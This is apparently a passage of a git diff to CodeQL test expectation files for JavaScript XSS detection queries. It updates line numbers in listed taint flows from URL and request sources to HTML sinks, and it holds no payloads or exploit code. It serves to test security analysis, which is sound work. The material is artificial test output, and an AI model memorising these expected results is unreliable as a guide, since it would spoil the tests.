.search | tst.js:355:7:355:39 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:367:18:367:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:369:18:369:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:380:18:380:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:389:18:389:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:391:19:391:24 | target | provenance | | +| tst.js:364:16:364:39 | documen ... .search | tst.js:364:7:364:39 | target | provenance | | +| tst.js:369:18:369:23 | target | tst.js:369:18:369:29 | target.taint | provenance | | +| tst.js:374:3:374:8 | [post update] target [taint3] | tst.js:375:18:375:23 | target [taint3] | provenance | | +| tst.js:374:19:374:42 | documen ... .search | tst.js:374:3:374:8 | [post update] target [taint3] | provenance | | +| tst.js:375:18:375:23 | target [taint3] | tst.js:375:18:375:30 | target.taint3 | provenance | | +| tst.js:380:18:380:23 | target | tst.js:380:18:380:30 | target.taint5 | provenance | | +| tst.js:389:18:389:23 | target | tst.js:389:18:389:30 | target.taint7 | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:391:19:391:24 | target [taint8] | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:392:18:392:23 | target [taint8] | provenance | | +| tst.js:391:19:391:24 | target | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:24 | target [taint8] | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:31 | target.taint8 | tst.js:391:3:391:8 | [post update] target [taint8] | provenance | | +| tst.js:392:18:392:23 | target [taint8] | tst.js:392:18:392:30 | target.taint8 | provenance | | +| tst.js:399:7:399:46 | payload | tst.js:400:18:400:24 | payload | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... 
bstr(1) | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | Config | +| tst.js:399:17:399:46 | window. ... bstr(1) | tst.js:399:7:399:46 | payload | provenance | | +| tst.js:402:7:402:55 | match | tst.js:404:20:404:24 | match | provenance | | +| tst.js:402:15:402:34 | window.location.hash | tst.js:402:15:402:55 | window. ... (\\w+)/) | provenance | | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | tst.js:402:7:402:55 | match | provenance | | +| tst.js:404:20:404:24 | match | tst.js:404:20:404:27 | match[1] | provenance | | +| tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:48 | window. ... it('#') [1] | provenance | Config | +| tst.js:407:18:407:48 | window. ... it('#') [1] | tst.js:407:18:407:51 | window. ... '#')[1] | provenance | | +| tst.js:411:7:411:39 | target | tst.js:413:18:413:23 | target | provenance | | +| tst.js:411:16:411:39 | documen ... .search | tst.js:411:7:411:39 | target | provenance | | +| tst.js:413:18:413:23 | target | tst.js:413:18:413:89 | target. ... data>') | provenance | | +| tst.js:419:6:419:38 | source | tst.js:423:28:423:33 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:424:33:424:38 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:425:34:425:39 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:426:41:426:46 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:427:44:427:49 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:428:32:428:37 | source | provenance | | +| tst.js:419:15:419:38 | documen ... .search | tst.js:419:6:419:38 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:438:18:438:23 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:439:36:439:41 | source | provenance | | +| tst.js:436:16:436:39 | documen ... 
.search | tst.js:436:7:436:39 | source | provenance | | +| tst.js:439:36:439:41 | source | tst.js:439:18:439:42 | ansiToH ... source) | provenance | | +| tst.js:443:6:443:38 | source | tst.js:446:21:446:26 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:448:19:448:24 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:450:20:450:25 | source | provenance | | +| tst.js:443:15:443:38 | documen ... .search | tst.js:443:6:443:38 | source | provenance | | +| tst.js:454:7:454:46 | url | tst.js:456:19:456:21 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:457:26:457:28 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:458:25:458:27 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:459:20:459:22 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:469:22:469:24 | url | provenance | | +| tst.js:454:13:454:36 | documen ... .search | tst.js:454:13:454:46 | documen ... bstr(1) | provenance | Config | +| tst.js:454:13:454:46 | documen ... bstr(1) | tst.js:454:7:454:46 | url | provenance | | +| tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | provenance | Config | +| tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | provenance | Config | +| tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | provenance | | +| tst.js:491:7:491:39 | target | tst.js:492:18:492:23 | target | provenance | | +| tst.js:491:16:491:39 | documen ... .search | tst.js:491:7:491:39 | target | provenance | | +| tst.js:492:18:492:23 | target | tst.js:492:18:492:54 | target. ... "), '') | provenance | | | typeahead.js:9:28:9:30 | loc | typeahead.js:10:16:10:18 | loc | provenance | | | typeahead.js:20:13:20:45 | target | typeahead.js:21:12:21:17 | target | provenance | | | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:20:13:20:45 | target | provenance | | 
@@ -1248,18 +1248,18 @@ subpaths | optionalSanitizer.js:41:28:41:35 | tainted3 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | | optionalSanitizer.js:45:41:45:46 | target | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | | tooltip.jsx:18:51:18:57 | provide [source] | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:18:51:18:59 | provide() | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | tst.js:40:16:40:44 | baz(doc ... search) | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
" ...
" | tst.js:46:16:46:45 | wrap(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
" ...
" | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
" ...
" | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | tst.js:34:16:34:44 | baz(doc ... search) | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
" ...
" | tst.js:39:16:39:45 | wrap(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
" ...
" | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
" ...
" | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | | various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | various-concat-obfuscations.js:14:24:14:28 | attrs | various-concat-obfuscations.js:15:10:15:83 | '
' | various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
') | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
') [ArrayElement] | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected index 9e842ab516ed..d4678176df1b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected 
@@ -1,41 +1,41 @@ edges -| ReflectedXss.js:8:33:8:45 | req.params.id | ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | provenance | | -| ReflectedXss.js:17:31:17:39 | params.id | ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | provenance | | -| ReflectedXss.js:23:19:23:26 | req.body | ReflectedXss.js:23:12:23:27 | marked(req.body) | provenance | | -| ReflectedXss.js:42:31:42:38 | req.body | ReflectedXss.js:42:12:42:39 | convert ... q.body) | provenance | | -| ReflectedXss.js:64:14:64:21 | req.body | ReflectedXss.js:64:39:64:42 | file | provenance | | -| ReflectedXss.js:64:39:64:42 | file | ReflectedXss.js:65:16:65:19 | file | provenance | | -| ReflectedXss.js:68:12:68:41 | remark( ... q.body) | ReflectedXss.js:68:12:68:52 | remark( ... tring() | provenance | | -| ReflectedXss.js:68:33:68:40 | req.body | ReflectedXss.js:68:12:68:41 | remark( ... q.body) | provenance | | -| ReflectedXss.js:72:12:72:56 | unified ... q.body) | ReflectedXss.js:72:12:72:65 | unified ... oString | provenance | | -| ReflectedXss.js:72:48:72:55 | req.body | ReflectedXss.js:72:12:72:56 | unified ... q.body) | provenance | | -| ReflectedXss.js:74:20:74:27 | req.body | ReflectedXss.js:74:34:74:34 | f | provenance | | -| ReflectedXss.js:74:34:74:34 | f | ReflectedXss.js:75:14:75:14 | f | provenance | | -| ReflectedXss.js:84:22:84:29 | req.body | ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | provenance | | -| ReflectedXss.js:85:23:85:30 | req.body | ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | provenance | | -| ReflectedXss.js:98:30:98:37 | req.body | ReflectedXss.js:98:12:98:38 | markdow ... q.body) | provenance | | -| ReflectedXss.js:100:31:100:38 | req.body | ReflectedXss.js:100:12:100:39 | markdow ... q.body) | provenance | | -| ReflectedXss.js:103:76:103:83 | req.body | ReflectedXss.js:103:12:103:84 | markdow ... 
q.body) | provenance | | -| ReflectedXss.js:114:11:114:41 | queryKeys | ReflectedXss.js:116:18:116:26 | queryKeys | provenance | | -| ReflectedXss.js:114:13:114:27 | keys: queryKeys | ReflectedXss.js:114:11:114:41 | queryKeys | provenance | | -| ReflectedXss.js:116:11:116:45 | keys | ReflectedXss.js:118:50:118:53 | keys | provenance | | -| ReflectedXss.js:116:11:116:45 | keys | ReflectedXss.js:118:58:118:61 | keys | provenance | | -| ReflectedXss.js:116:18:116:26 | queryKeys | ReflectedXss.js:116:11:116:45 | keys | provenance | | -| ReflectedXss.js:116:31:116:45 | paramKeys?.keys | ReflectedXss.js:116:11:116:45 | keys | provenance | | -| ReflectedXss.js:118:11:118:61 | keyArray | ReflectedXss.js:119:25:119:32 | keyArray | provenance | | -| ReflectedXss.js:118:11:118:61 | keyArray [0] | ReflectedXss.js:119:25:119:32 | keyArray [0] | provenance | | -| ReflectedXss.js:118:49:118:54 | [keys] [0] | ReflectedXss.js:118:11:118:61 | keyArray [0] | provenance | | -| ReflectedXss.js:118:50:118:53 | keys | ReflectedXss.js:118:49:118:54 | [keys] [0] | provenance | | -| ReflectedXss.js:118:58:118:61 | keys | ReflectedXss.js:118:11:118:61 | keyArray | provenance | | -| ReflectedXss.js:119:11:119:72 | invalidKeys | ReflectedXss.js:122:33:122:43 | invalidKeys | provenance | | -| ReflectedXss.js:119:11:119:72 | invalidKeys [0] | ReflectedXss.js:122:33:122:43 | invalidKeys [0] | provenance | | -| ReflectedXss.js:119:25:119:32 | keyArray | ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | provenance | | -| ReflectedXss.js:119:25:119:32 | keyArray [0] | ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | provenance | | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | ReflectedXss.js:119:11:119:72 | invalidKeys | provenance | | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | ReflectedXss.js:119:11:119:72 | invalidKeys [0] | provenance | | -| ReflectedXss.js:122:33:122:43 | invalidKeys | ReflectedXss.js:122:33:122:54 | invalid ... 
n(', ') | provenance | | -| ReflectedXss.js:122:33:122:43 | invalidKeys [0] | ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | provenance | | -| ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | provenance | | +| ReflectedXss.js:7:33:7:45 | req.params.id | ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | provenance | | +| ReflectedXss.js:16:31:16:39 | params.id | ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | provenance | | +| ReflectedXss.js:22:19:22:26 | req.body | ReflectedXss.js:22:12:22:27 | marked(req.body) | provenance | | +| ReflectedXss.js:41:31:41:38 | req.body | ReflectedXss.js:41:12:41:39 | convert ... q.body) | provenance | | +| ReflectedXss.js:63:14:63:21 | req.body | ReflectedXss.js:63:39:63:42 | file | provenance | | +| ReflectedXss.js:63:39:63:42 | file | ReflectedXss.js:64:16:64:19 | file | provenance | | +| ReflectedXss.js:67:12:67:41 | remark( ... q.body) | ReflectedXss.js:67:12:67:52 | remark( ... tring() | provenance | | +| ReflectedXss.js:67:33:67:40 | req.body | ReflectedXss.js:67:12:67:41 | remark( ... q.body) | provenance | | +| ReflectedXss.js:71:12:71:56 | unified ... q.body) | ReflectedXss.js:71:12:71:65 | unified ... oString | provenance | | +| ReflectedXss.js:71:48:71:55 | req.body | ReflectedXss.js:71:12:71:56 | unified ... q.body) | provenance | | +| ReflectedXss.js:73:20:73:27 | req.body | ReflectedXss.js:73:34:73:34 | f | provenance | | +| ReflectedXss.js:73:34:73:34 | f | ReflectedXss.js:74:14:74:14 | f | provenance | | +| ReflectedXss.js:83:22:83:29 | req.body | ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | provenance | | +| ReflectedXss.js:84:23:84:30 | req.body | ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | provenance | | +| ReflectedXss.js:97:30:97:37 | req.body | ReflectedXss.js:97:12:97:38 | markdow ... q.body) | provenance | | +| ReflectedXss.js:99:31:99:38 | req.body | ReflectedXss.js:99:12:99:39 | markdow ... 
q.body) | provenance | | +| ReflectedXss.js:102:76:102:83 | req.body | ReflectedXss.js:102:12:102:84 | markdow ... q.body) | provenance | | +| ReflectedXss.js:113:11:113:41 | queryKeys | ReflectedXss.js:115:18:115:26 | queryKeys | provenance | | +| ReflectedXss.js:113:13:113:27 | keys: queryKeys | ReflectedXss.js:113:11:113:41 | queryKeys | provenance | | +| ReflectedXss.js:115:11:115:45 | keys | ReflectedXss.js:117:50:117:53 | keys | provenance | | +| ReflectedXss.js:115:11:115:45 | keys | ReflectedXss.js:117:58:117:61 | keys | provenance | | +| ReflectedXss.js:115:18:115:26 | queryKeys | ReflectedXss.js:115:11:115:45 | keys | provenance | | +| ReflectedXss.js:115:31:115:45 | paramKeys?.keys | ReflectedXss.js:115:11:115:45 | keys | provenance | | +| ReflectedXss.js:117:11:117:61 | keyArray | ReflectedXss.js:118:25:118:32 | keyArray | provenance | | +| ReflectedXss.js:117:11:117:61 | keyArray [0] | ReflectedXss.js:118:25:118:32 | keyArray [0] | provenance | | +| ReflectedXss.js:117:49:117:54 | [keys] [0] | ReflectedXss.js:117:11:117:61 | keyArray [0] | provenance | | +| ReflectedXss.js:117:50:117:53 | keys | ReflectedXss.js:117:49:117:54 | [keys] [0] | provenance | | +| ReflectedXss.js:117:58:117:61 | keys | ReflectedXss.js:117:11:117:61 | keyArray | provenance | | +| ReflectedXss.js:118:11:118:72 | invalidKeys | ReflectedXss.js:121:33:121:43 | invalidKeys | provenance | | +| ReflectedXss.js:118:11:118:72 | invalidKeys [0] | ReflectedXss.js:121:33:121:43 | invalidKeys [0] | provenance | | +| ReflectedXss.js:118:25:118:32 | keyArray | ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | provenance | | +| ReflectedXss.js:118:25:118:32 | keyArray [0] | ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | provenance | | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | ReflectedXss.js:118:11:118:72 | invalidKeys | provenance | | +| ReflectedXss.js:118:25:118:72 | keyArra ... 
s(key)) [0] | ReflectedXss.js:118:11:118:72 | invalidKeys [0] | provenance | | +| ReflectedXss.js:121:33:121:43 | invalidKeys | ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | provenance | | +| ReflectedXss.js:121:33:121:43 | invalidKeys [0] | ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | provenance | | +| ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | provenance | | | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | provenance | | | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | provenance | | | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | provenance | | 
@@ -144,63 +144,63 @@ edges | tst3.js:11:16:11:74 | prettie ... bel" }) | tst3.js:11:9:11:74 | code | provenance | | | tst3.js:11:32:11:39 | reg.body | tst3.js:11:16:11:74 | prettie ... bel" }) | provenance | | nodes -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | -| ReflectedXss.js:8:33:8:45 | req.params.id | semmle.label | req.params.id | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | -| ReflectedXss.js:17:31:17:39 | params.id | semmle.label | params.id | -| ReflectedXss.js:22:12:22:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | semmle.label | marked(req.body) | -| ReflectedXss.js:23:19:23:26 | req.body | semmle.label | req.body | -| ReflectedXss.js:29:12:29:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:41:12:41:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | semmle.label | convert ... q.body) | -| ReflectedXss.js:42:31:42:38 | req.body | semmle.label | req.body | -| ReflectedXss.js:56:12:56:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:64:14:64:21 | req.body | semmle.label | req.body | -| ReflectedXss.js:64:39:64:42 | file | semmle.label | file | -| ReflectedXss.js:65:16:65:19 | file | semmle.label | file | -| ReflectedXss.js:68:12:68:41 | remark( ... q.body) | semmle.label | remark( ... q.body) | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | semmle.label | remark( ... tring() | -| ReflectedXss.js:68:33:68:40 | req.body | semmle.label | req.body | -| ReflectedXss.js:72:12:72:56 | unified ... q.body) | semmle.label | unified ... q.body) | -| ReflectedXss.js:72:12:72:65 | unified ... oString | semmle.label | unified ... 
oString | -| ReflectedXss.js:72:48:72:55 | req.body | semmle.label | req.body | -| ReflectedXss.js:74:20:74:27 | req.body | semmle.label | req.body | -| ReflectedXss.js:74:34:74:34 | f | semmle.label | f | -| ReflectedXss.js:75:14:75:14 | f | semmle.label | f | -| ReflectedXss.js:83:12:83:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | semmle.label | snarkdown(req.body) | -| ReflectedXss.js:84:22:84:29 | req.body | semmle.label | req.body | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | semmle.label | snarkdown2(req.body) | -| ReflectedXss.js:85:23:85:30 | req.body | semmle.label | req.body | -| ReflectedXss.js:97:12:97:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:98:30:98:37 | req.body | semmle.label | req.body | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:100:31:100:38 | req.body | semmle.label | req.body | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | semmle.label | markdow ... 
q.body) | -| ReflectedXss.js:103:76:103:83 | req.body | semmle.label | req.body | -| ReflectedXss.js:110:16:110:30 | request.query.p | semmle.label | request.query.p | -| ReflectedXss.js:114:11:114:41 | queryKeys | semmle.label | queryKeys | -| ReflectedXss.js:114:13:114:27 | keys: queryKeys | semmle.label | keys: queryKeys | -| ReflectedXss.js:116:11:116:45 | keys | semmle.label | keys | -| ReflectedXss.js:116:18:116:26 | queryKeys | semmle.label | queryKeys | -| ReflectedXss.js:116:31:116:45 | paramKeys?.keys | semmle.label | paramKeys?.keys | -| ReflectedXss.js:118:11:118:61 | keyArray | semmle.label | keyArray | -| ReflectedXss.js:118:11:118:61 | keyArray [0] | semmle.label | keyArray [0] | -| ReflectedXss.js:118:49:118:54 | [keys] [0] | semmle.label | [keys] [0] | -| ReflectedXss.js:118:50:118:53 | keys | semmle.label | keys | -| ReflectedXss.js:118:58:118:61 | keys | semmle.label | keys | -| ReflectedXss.js:119:11:119:72 | invalidKeys | semmle.label | invalidKeys | -| ReflectedXss.js:119:11:119:72 | invalidKeys [0] | semmle.label | invalidKeys [0] | -| ReflectedXss.js:119:25:119:32 | keyArray | semmle.label | keyArray | -| ReflectedXss.js:119:25:119:32 | keyArray [0] | semmle.label | keyArray [0] | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | semmle.label | keyArra ... s(key)) | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | semmle.label | keyArra ... s(key)) [0] | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | semmle.label | `${inva ... telist` | -| ReflectedXss.js:122:33:122:43 | invalidKeys | semmle.label | invalidKeys | -| ReflectedXss.js:122:33:122:43 | invalidKeys [0] | semmle.label | invalidKeys [0] | -| ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | semmle.label | invalid ... n(', ') | +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | +| ReflectedXss.js:7:33:7:45 | req.params.id | semmle.label | req.params.id | +| ReflectedXss.js:16:12:16:39 | "Unknow ... 
rams.id | semmle.label | "Unknow ... rams.id | +| ReflectedXss.js:16:31:16:39 | params.id | semmle.label | params.id | +| ReflectedXss.js:21:12:21:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | semmle.label | marked(req.body) | +| ReflectedXss.js:22:19:22:26 | req.body | semmle.label | req.body | +| ReflectedXss.js:28:12:28:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:40:12:40:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | semmle.label | convert ... q.body) | +| ReflectedXss.js:41:31:41:38 | req.body | semmle.label | req.body | +| ReflectedXss.js:55:12:55:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:63:14:63:21 | req.body | semmle.label | req.body | +| ReflectedXss.js:63:39:63:42 | file | semmle.label | file | +| ReflectedXss.js:64:16:64:19 | file | semmle.label | file | +| ReflectedXss.js:67:12:67:41 | remark( ... q.body) | semmle.label | remark( ... q.body) | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | semmle.label | remark( ... tring() | +| ReflectedXss.js:67:33:67:40 | req.body | semmle.label | req.body | +| ReflectedXss.js:71:12:71:56 | unified ... q.body) | semmle.label | unified ... q.body) | +| ReflectedXss.js:71:12:71:65 | unified ... oString | semmle.label | unified ... 
oString | +| ReflectedXss.js:71:48:71:55 | req.body | semmle.label | req.body | +| ReflectedXss.js:73:20:73:27 | req.body | semmle.label | req.body | +| ReflectedXss.js:73:34:73:34 | f | semmle.label | f | +| ReflectedXss.js:74:14:74:14 | f | semmle.label | f | +| ReflectedXss.js:82:12:82:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | semmle.label | snarkdown(req.body) | +| ReflectedXss.js:83:22:83:29 | req.body | semmle.label | req.body | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | semmle.label | snarkdown2(req.body) | +| ReflectedXss.js:84:23:84:30 | req.body | semmle.label | req.body | +| ReflectedXss.js:96:12:96:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:97:30:97:37 | req.body | semmle.label | req.body | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:99:31:99:38 | req.body | semmle.label | req.body | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | semmle.label | markdow ... 
q.body) | +| ReflectedXss.js:102:76:102:83 | req.body | semmle.label | req.body | +| ReflectedXss.js:109:16:109:30 | request.query.p | semmle.label | request.query.p | +| ReflectedXss.js:113:11:113:41 | queryKeys | semmle.label | queryKeys | +| ReflectedXss.js:113:13:113:27 | keys: queryKeys | semmle.label | keys: queryKeys | +| ReflectedXss.js:115:11:115:45 | keys | semmle.label | keys | +| ReflectedXss.js:115:18:115:26 | queryKeys | semmle.label | queryKeys | +| ReflectedXss.js:115:31:115:45 | paramKeys?.keys | semmle.label | paramKeys?.keys | +| ReflectedXss.js:117:11:117:61 | keyArray | semmle.label | keyArray | +| ReflectedXss.js:117:11:117:61 | keyArray [0] | semmle.label | keyArray [0] | +| ReflectedXss.js:117:49:117:54 | [keys] [0] | semmle.label | [keys] [0] | +| ReflectedXss.js:117:50:117:53 | keys | semmle.label | keys | +| ReflectedXss.js:117:58:117:61 | keys | semmle.label | keys | +| ReflectedXss.js:118:11:118:72 | invalidKeys | semmle.label | invalidKeys | +| ReflectedXss.js:118:11:118:72 | invalidKeys [0] | semmle.label | invalidKeys [0] | +| ReflectedXss.js:118:25:118:32 | keyArray | semmle.label | keyArray | +| ReflectedXss.js:118:25:118:32 | keyArray [0] | semmle.label | keyArray [0] | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | semmle.label | keyArra ... s(key)) | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | semmle.label | keyArra ... s(key)) [0] | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | semmle.label | `${inva ... telist` | +| ReflectedXss.js:121:33:121:43 | invalidKeys | semmle.label | invalidKeys | +| ReflectedXss.js:121:33:121:43 | invalidKeys [0] | semmle.label | invalidKeys [0] | +| ReflectedXss.js:121:33:121:54 | invalid ... n(', 